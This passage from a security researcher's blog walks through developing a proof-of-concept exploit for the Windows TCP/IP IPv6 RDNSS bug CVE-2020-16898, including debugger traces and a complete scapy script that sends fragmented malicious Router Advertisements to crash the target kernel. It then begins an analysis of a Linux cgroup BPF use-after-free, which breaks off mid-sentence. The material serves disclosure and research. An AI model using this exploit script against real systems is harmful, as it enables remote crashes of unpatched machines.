04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

Works! OK, let’s move to the triggering bug phase.

Triggering the bug

What we know from the detection logic write-up:

“we check to see if the Length (second byte in the Option) is an even number”

Let’s test it:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

and we end up executing this code:

fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
fffff804`4852a5bf 418bd7          mov     edx,r15d
fffff804`4852a5c2 498bce          mov     rcx,r14
fffff804`4852a5c5 488bd8          mov     rbx,rax
fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
fffff804`4852a5d4 2bc6            sub     eax,esi
fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
fffff804`4852a5da 99              cdq
fffff804`4852a5db f7f9            idiv    eax,ecx
fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
fffff804`4852a5e3 8bf0            mov     esi,eax
fffff804`4852a5e5 413bd7          cmp     edx,r15d
fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as:

tmp = (Length - 1) / 2

This logic generates the same result for the odd and even number:

(8 – 1) / 2 => 3
(7 – 1) / 2 => 3

There is nothing wrong with that by itself. However, this also “defines” how long is the package. Since IPv6 addresses are 16 bytes long, by providing even number, the last 8 bytes of the payload will be used as a beginning of the next header. We can see that in the Wireshark as well:

Zdjęcie

That’s pretty interesting. However, what to do with that? What next header should we fake? Why this matters at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find it out 🙂

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml):

What we do know is that ICMPv6 messages have the following general format:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |     Type      |     Code      |          Checksum             |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      +                         Message Body                          +
      |                                                               |

First byte is encoding “type” of the package. I’ve made the test and I’ve generated next header to be exactly the same as the “buggy” RDNSS one. I’ve been hitting breakpoint for tcpip!Ipv6pUpdateRDNSS but tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I’ve run my IDA Pro and started to analyze what’s going on and what logic is being executed. After some reverse engineering I realized that we have 2 loops in the code:

  1. First loop goes through all the headers and does some basic validation (size of length etc)
  2. Second loop doesn’t do any more validation but parses the package.

As soon as there are more ‘optional headers’ in the buffer, we are in the loop. That’s a very good primitive! Anyway, I still don’t know what headers should be used and to find it out I had been brute-forcing all the ‘optional header’ types in the triggered bug and found out that second loop cares only about:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)

I’ve analyzed Type 24 logic since it was much “smaller / shorter” than Type 3.

Stack overflow

OK. Let’s try to generate the malicious RDNSS packet “faking” Route Information as a next one:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

This never hits tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the package.

After debugging I’ve realized that we are failing in the following check:

fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
fffff804`483ba76a 413bc7          cmp     eax,r15d
fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the package and r15 keeps an information of how much data were consumed. In that specific case we have:

rax = 0x48
r15 = 0x40

This is exactly 8 bytes difference because we use an even number. To bypass it, I’ve placed another header just after the last one. However, I was still hitting the same problem 🙁 It took me some time to figure out how to play with the packet layout to bypass it. I’ve finally managed to do so.

Problem 4 – size again!

Finally, I’ve found the correct packet layout and I could end up in the code responsible for handling Route Information header. However, I did not 🙂 Here is why. After returning from the RDNSS I ended up here:

fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
fffff804`483bad21 0fb64801        movzx   ecx,byte ptr [rax+1]
fffff804`483bad25 66c1e103        shl     cx,3
fffff804`483bad29 66894c2462      mov     word ptr [rsp+62h],cx
fffff804`483bad2e 6685c9          test    cx,cx
fffff804`483bad31 0f8485060000    je      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)
fffff804`483bad37 0fb7c9          movzx   ecx,cx
fffff804`483bad3a 413b4e18        cmp     ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8
fffff804`483bad3e 0f8778060000    ja      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)

ecx keeps the information about the “Length” of the “fake header”. However, [r14+18h] points to the size of the data left in the package. I set Length to the max (0xFF) which is multiplied by 8 (2040 == 0x7f8). However, there is only “0xb8” bytes left. So, I’ve failed another size validation!

To be able to fix it, I’ve decreased the size of the “fake header” and at the same time attached more data to the package. That worked!

Problem 5 – NdisGetDataBuffer() and fragmentation

I’ve finally found all the puzzles to be able to trigger the bug. I thought so… I ended up executing the following code responsible for handling Route Information message:

fffff804`48472cd9 33c0            xor     eax,eax
fffff804`48472cdb 44897c2420      mov     dword ptr [rsp+20h],r15d
fffff804`48472ce0 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472ce6 4c8d85b8010000  lea     r8,[rbp+1B8h]
fffff804`48472ced 418bd7          mov     edx,r15d
fffff804`48472cf0 488985b8010000  mov     qword ptr [rbp+1B8h],rax
fffff804`48472cf7 448bcf          mov     r9d,edi
fffff804`48472cfa 488985c0010000  mov     qword ptr [rbp+1C0h],rax
fffff804`48472d01 498bce          mov     rcx,r14
fffff804`48472d04 488985c8010000  mov     qword ptr [rbp+1C8h],rax
fffff804`48472d0b 48898580010000  mov     qword ptr [rbp+180h],rax
fffff804`48472d12 48898588010000  mov     qword ptr [rbp+188h],rax
fffff804`48472d19 4c8b1558041300  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0

It tries to get the “Length” bytes from the packet to read the entire header. However, Length is fake and not validated. In my test case it has value “0x100”. Destination address is pointing to the stack which represents Route Information header. It is a very small buffer. So, we should have classic stack overflow, but inside of the NdisGetDataBuffer function I ended-up executing this:

fffff804`4820e10c 8b7910          mov     edi,dword ptr [rcx+10h]
fffff804`4820e10f 8b4328          mov     eax,dword ptr [rbx+28h]
fffff804`4820e112 8bf2            mov     esi,edx
fffff804`4820e114 488d0c3e        lea     rcx,[rsi+rdi]
fffff804`4820e118 483bc8          cmp     rcx,rax
fffff804`4820e11b 773e            ja      fffff804`4820e15b
fffff804`4820e11d f6430a05        test    byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c
fffff804`4820e121 0f84813f0400    je      fffff804`482520a8
fffff804`4820e127 488b4318        mov     rax,qword ptr [rbx+18h]
fffff804`4820e12b 4885c0          test    rax,rax
fffff804`4820e12e 742b            je      fffff804`4820e15b
fffff804`4820e130 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff804`4820e134 8d55ff          lea     edx,[rbp-1]
fffff804`4820e137 4803c7          add     rax,rdi
fffff804`4820e13a 4823d0          and     rdx,rax
fffff804`4820e13d 483bd1          cmp     rdx,rcx
fffff804`4820e140 7519            jne     fffff804`4820e15b
fffff804`4820e142 488b5c2450      mov     rbx,qword ptr [rsp+50h]
fffff804`4820e147 488b6c2458      mov     rbp,qword ptr [rsp+58h]
fffff804`4820e14c 488b742460      mov     rsi,qword ptr [rsp+60h]
fffff804`4820e151 4883c430        add     rsp,30h
fffff804`4820e155 415f            pop     r15
fffff804`4820e157 415e            pop     r14
fffff804`4820e159 5f              pop     rdi
fffff804`4820e15a c3              ret
fffff804`4820e15b 4d85f6          test    r14,r14

In the first ‘cmp‘ instruction, rcx register keeps the value of the requested size. Rax register keeps some huge number, and because of that I could never jump out from that logic. As a result of that call, I had been getting a different address than local stack address and none of the overflow happens. I didn’t know what was going on… So, I started to read the documentation of this function and here is the magic:

“If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows:
If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter.
If the Storage parameter is NULL, the return value is NULL.”

Here we go… Our big package is kept somewhere in NDIS and pointer to that data is returned instead of copying it to the local buffer on the stack. I started to Google if anyone was already hitting that problem and… of course yes 🙂 Looking at this link:

http://newsoft-tech.blogspot.com/2010/02/

we can learn that the simplest solution is to fragment the package. This is exactly what I’ve done and….

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc              int     3
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go! 🙂

Proof-of-Concept

Code can be found here:

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

CVE: 2020-14356 & 2020-25220

By: pi3
11 September 2020 at 05:35

The short story of 1 Linux Kernel Use-After-Free bug and 2 CVEs (CVE-2020-14356 and CVE-2020-25220)

Name:     Linux kernel Cgroup BPF Use-After-Free
Author:   Adam Zabrocki ([email protected])
Date:       May 27, 2020

First things first – short history:

In 2019 Tejun Heo discovered a racing problem with lifetime of the cgroup_bpf which could result in double-free and other memory corruptions. This bug was fixed in kernel 5.3. More information about the problem and the patch can be found here:

https://lore.kernel.org/patchwork/patch/1094080/

Roman Gushchin discovered another problem with the newly fixed code which could lead to use-after-free vulnerability. His report and fix can be found here:

https://lore.kernel.org/bpf/[email protected]/

During the discussion on the fix, Alexei Starovoitov pointed out that walking through the cgroup hierarchy without holding cgroup_mutex might be dangerous:

https://lore.kernel.org/bpf/20200104003523.rfte5rw6hbnncjes@ast-mbp/

However, Roman and Alexei concluded that it shouldn’t be a problem:

https://lore.kernel.org/bpf/20200106220746.fm3hp3zynaiaqgly@ast-mbp/

Unfortunately, there is another Use-After-Free bug related to the Cgroup BPF release logic.

The “new” bug – details (a lot of details ;-)):

During LKRG development and tests, one of my VMs was generating a kernel crash during shutdown procedure. This specific machine had the newest kernel at that time (5.7.x) and I compiled it with all debug information as well as SLAB DEBUG feature. When I analyzed the crash, it had nothing to do with LKRG. Later I confirmed that kernels without LKRG are always hitting that issue:

      KERNEL: linux-5.7/vmlinux
    DUMPFILE: /var/crash/202006161848/dump.202006161848  [PARTIAL DUMP]
        CPUS: 1
        DATE: Tue Jun 16 18:47:40 2020
      UPTIME: 14:09:24
LOAD AVERAGE: 0.21, 0.37, 0.50
       TASKS: 234
    NODENAME: oi3
     RELEASE: 5.7.0-g4
     VERSION: #28 SMP PREEMPT Fri Jun 12 18:09:14 UTC 2020
     MACHINE: x86_64  (3694 Mhz)
      MEMORY: 8 GB
       PANIC: "Oops: 0000 [#1] PREEMPT SMP PTI" (check log for details)
         PID: 1060499
     COMMAND: "sshd"
        TASK: ffff9d8c36b33040  [THREAD_INFO: ffff9d8c36b33040]
         CPU: 0
       STATE:  (PANIC)

crash> bt
PID: 1060499  TASK: ffff9d8c36b33040  CPU: 0   COMMAND: "sshd"
 #0 [ffffb0fc41b1f990] machine_kexec at ffffffff9404d22f
 #1 [ffffb0fc41b1f9d8] __crash_kexec at ffffffff941c19b8
 #2 [ffffb0fc41b1faa0] crash_kexec at ffffffff941c2b60
 #3 [ffffb0fc41b1fab0] oops_end at ffffffff94019d3e
 #4 [ffffb0fc41b1fad0] page_fault at ffffffff95c0104f
    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9423e801  RSP: ffffb0fc41b1fb88  RFLAGS: 00010246
    RAX: 0000000000000000  RBX: ffff9d8d56ae1ee0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9d8e25c40b00  RDI: ffffffff9423e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001
    ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018
 #5 [ffffb0fc41b1fbd0] ip_finish_output at ffffffff957d71b3
 #6 [ffffb0fc41b1fbf8] __ip_queue_xmit at ffffffff957d84e1
 #7 [ffffb0fc41b1fc50] __tcp_transmit_skb at ffffffff957f4b27
 #8 [ffffb0fc41b1fd58] tcp_write_xmit at ffffffff957f6579
 #9 [ffffb0fc41b1fdb8] __tcp_push_pending_frames at ffffffff957f737d
#10 [ffffb0fc41b1fdd0] tcp_close at ffffffff957e6ec1
#11 [ffffb0fc41b1fdf8] inet_release at ffffffff9581809f
#12 [ffffb0fc41b1fe10] __sock_release at ffffffff95616848
#13 [ffffb0fc41b1fe30] sock_close at ffffffff956168bc
#14 [ffffb0fc41b1fe38] __fput at ffffffff942fd3cd
#15 [ffffb0fc41b1fe78] task_work_run at ffffffff94148a4a
#16 [ffffb0fc41b1fe98] do_exit at ffffffff9412b144
#17 [ffffb0fc41b1ff08] do_group_exit at ffffffff9412b8ae
#18 [ffffb0fc41b1ff30] __x64_sys_exit_group at ffffffff9412b92f
#19 [ffffb0fc41b1ff38] do_syscall_64 at ffffffff940028d7
#20 [ffffb0fc41b1ff50] entry_SYSCALL_64_after_hwframe at ffffffff95c0007c
    RIP: 00007fe54ea30136  RSP: 00007fff33413468  RFLAGS: 00000202
    RAX: ffffffffffffffda  RBX: 00007fff334134e0  RCX: 00007fe54ea30136
    RDX: 00000000000000ff  RSI: 000000000000003c  RDI: 00000000000000ff
    RBP: 00000000000000ff   R8: 00000000000000e7   R9: fffffffffffffdf0
    R10: 000055a091a22d09  R11: 0000000000000202  R12: 000055a091d67f20
    R13: 00007fe54ea5afa0  R14: 000055a091d7ef70  R15: 000055a091d70a20
    ORIG_RAX: 00000000000000e7  CS: 0033  SS: 002b

1060499 is a sshd’s child:

...
root        5462  0.0  0.0  12168  7276 ?        Ss   04:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
...
root     1060499  0.0  0.1  13936  9056 ?        Ss   17:51   0:00  \_ sshd: pi3 [priv]
pi3      1062463  0.0  0.0  13936  5852 ?        S    17:51   0:00      \_ sshd: pi3@pts/3
...

Crash happens in function “__cgroup_bpf_run_filter_skb”, exactly in this piece of code:

0xffffffff9423e7ee <__cgroup_bpf_run_filter_skb+382>: callq  0xffffffff94153cb0 <preempt_count_add>
0xffffffff9423e7f3 <__cgroup_bpf_run_filter_skb+387>: callq  0xffffffff941925a0 <__rcu_read_lock>
0xffffffff9423e7f8 <__cgroup_bpf_run_filter_skb+392>: mov 0x3e8(%rbp),%rax
0xffffffff9423e7ff <__cgroup_bpf_run_filter_skb+399>: xor %ebp,%ebp
0xffffffff9423e801 <__cgroup_bpf_run_filter_skb+401>: mov 0x10(%rax),%rdi
                                                          ^^^^^^^^^^^^^^^
0xffffffff9423e805 <__cgroup_bpf_run_filter_skb+405>: lea 0x10(%rax),%r14
0xffffffff9423e809 <__cgroup_bpf_run_filter_skb+409>: test %rdi,%rdi

where RAX: 0000000000000000. However, when I was playing with repro under SLAB_DEBUG, I often got RAX: 6b6b6b6b6b6b6b6b:

    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9123e801  RSP: ffffb136c16ffb88  RFLAGS: 00010246
    RAX: 6b6b6b6b6b6b6b6b  RBX: ffff9ce3e5a0e0e0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9ce3de26b280  RDI: ffffffff9123e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001

So we have kind of a Use-After-Free bug. This bug is triggerable from user-mode. I’ve looked under IDA for the binary:

.text:FFFFFFFF8123E7EE skb = rbx      ; sk_buff * ; PIC mode
.text:FFFFFFFF8123E7EE type = r15     ; bpf_attach_type
.text:FFFFFFFF8123E7EE save_sk = rsi  ; sock *
.text:FFFFFFFF8123E7EE        call    near ptr preempt_count_add-0EAB43h
.text:FFFFFFFF8123E7F3        call    near ptr __rcu_read_lock-0AC258h ; PIC mode
.text:FFFFFFFF8123E7F8        mov     ret, [rbp+3E8h]
.text:FFFFFFFF8123E7FF        xor     ebp, ebp
.text:FFFFFFFF8123E801 _cn = rbp      ; u32
.text:FFFFFFFF8123E801        mov     rdi, [ret+10h]  ; prog
.text:FFFFFFFF8123E805        lea     r14, [ret+10h]

and this code is referencing cgroups from the socket. Source code:

int __cgroup_bpf_run_filter_skb(struct sock *sk,
				struct sk_buff *skb,
				enum bpf_attach_type type)
{
    ...
	struct cgroup *cgrp;
    ...
... cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data); ... if (type == BPF_CGROUP_INET_EGRESS) { ret = BPF_PROG_CGROUP_INET_EGRESS_RUN_ARRAY( cgrp->bpf.effective[type], skb, __bpf_prog_run_save_cb); ... ... }

Debugger:

crash> x/4i 0xffffffff9423e7f8
   0xffffffff9423e7f8:  mov    0x3e8(%rbp),%rax
   0xffffffff9423e7ff:  xor    %ebp,%ebp
   0xffffffff9423e801:  mov    0x10(%rax),%rdi
   0xffffffff9423e805:  lea    0x10(%rax),%r14
crash> p/x (int)&((struct cgroup*)0)->bpf
$2 = 0x3e0
crash> ptype struct cgroup_bpf
type = struct cgroup_bpf {
    struct bpf_prog_array *effective[28];
    struct list_head progs[28];
    u32 flags[28];
    struct bpf_prog_array *inactive;
    struct percpu_ref refcnt;
    struct work_struct release_work;
}
crash> print/a sizeof(struct bpf_prog_array)
$3 = 0x10
crash> print/a ((struct sk_buff *)0xffff9ce3e5a0e0e0)->sk
$4 = 0xffff9ce3de26b280
crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

We also know that R15: 0000000000000001 == type == BPF_CGROUP_INET_EGRESS

crash> p/a ((struct cgroup *)0xffff9ce3e2416800)->bpf.effective[1]
$6 = 0x6b6b6b6b6b6b6b6b
crash> x/20a 0xffff9ce3e2416800
0xffff9ce3e2416800:     0x6b6b6b6b6b6b016b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416810:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416820:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416830:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416840:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416850:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416860:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416870:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416880:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416890:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
crash>

This pointer (struct cgroup *)

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

Points to the freed object. However, kernel still keeps eBPF rules attached to the socket under cgroups. When process (sshd) dies (do_exit() call) and cleanup is executed, all sockets are being closed. If such socket has “pending” packets, the following code path is executed:

do_exit -> ... -> sock_close -> __sock_release -> inet_release -> tcp_close -> __tcp_push_pending_frames -> tcp_write_xmit -> __tcp_transmit_skb -> __ip_queue_xmit -> ip_finish_output -> __cgroup_bpf_run_filter_skb

However, there is nothing wrong with such logic and path. The real problem is that cgroups disappeared while still holding active clients. How is that even possible? Just before the crash I can see the following entry in kernel logs:

[190820.457422] ------------[ cut here ]------------
[190820.457465] percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[190820.457511] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457511] Modules linked in: [last unloaded: p_lkrg]
[190820.457513] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Tainted: G           OE     5.7.0-g4 #28
[190820.457513] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[190820.457515] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457516] Code: eb b6 80 3d 11 95 5a 02 00 0f 85 65 ff ff ff 48 8b 55 d8 48 8b 75 e8 48 c7 c7 d0 9f 78 93 c6 05 f5 94 5a 02 01 e8 00 57 88 ff <0f> 0b e9 43 ff ff ff 0f 0b eb 9d cc cc cc 8d 8c 16 ef be ad de 89
[190820.457516] RSP: 0018:ffffb136c0087e00 EFLAGS: 00010286
[190820.457517] RAX: 0000000000000000 RBX: 7ffffffffffeec4a RCX: 0000000000000000
[190820.457517] RDX: 0000000000000101 RSI: ffffffff949235c0 RDI: 00000000ffffffff
[190820.457517] RBP: ffff9ce3e204af20 R08: 6d6f7461206f7420 R09: 63696d6f7461206f
[190820.457517] R10: 7320726574666120 R11: 676e696863746977 R12: 00003452c5002ce8
[190820.457518] R13: ffff9ce3f6e2b450 R14: ffff9ce2c7fc3100 R15: 0000000000000000
[190820.457526] FS:  0000000000000000(0000) GS:ffff9ce3f6e00000(0000) knlGS:0000000000000000
[190820.457527] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[190820.457527] CR2: 00007f516c2b9000 CR3: 0000000222c64006 CR4: 00000000003606f0
[190820.457550] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[190820.457551] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[190820.457551] Call Trace:
[190820.457577]  rcu_core+0x1df/0x530
[190820.457598]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457609]  __do_softirq+0xfc/0x331
[190820.457629]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457630]  run_ksoftirqd+0x21/0x30
[190820.457649]  smpboot_thread_fn+0x195/0x230
[190820.457660]  kthread+0x139/0x160
[190820.457670]  ? __kthread_bind_mask+0x60/0x60
[190820.457671]  ret_from_fork+0x35/0x40
[190820.457682] ---[ end trace 63d2aef89e998452 ]---

I was testing the same scenario a few times and I had the following results:

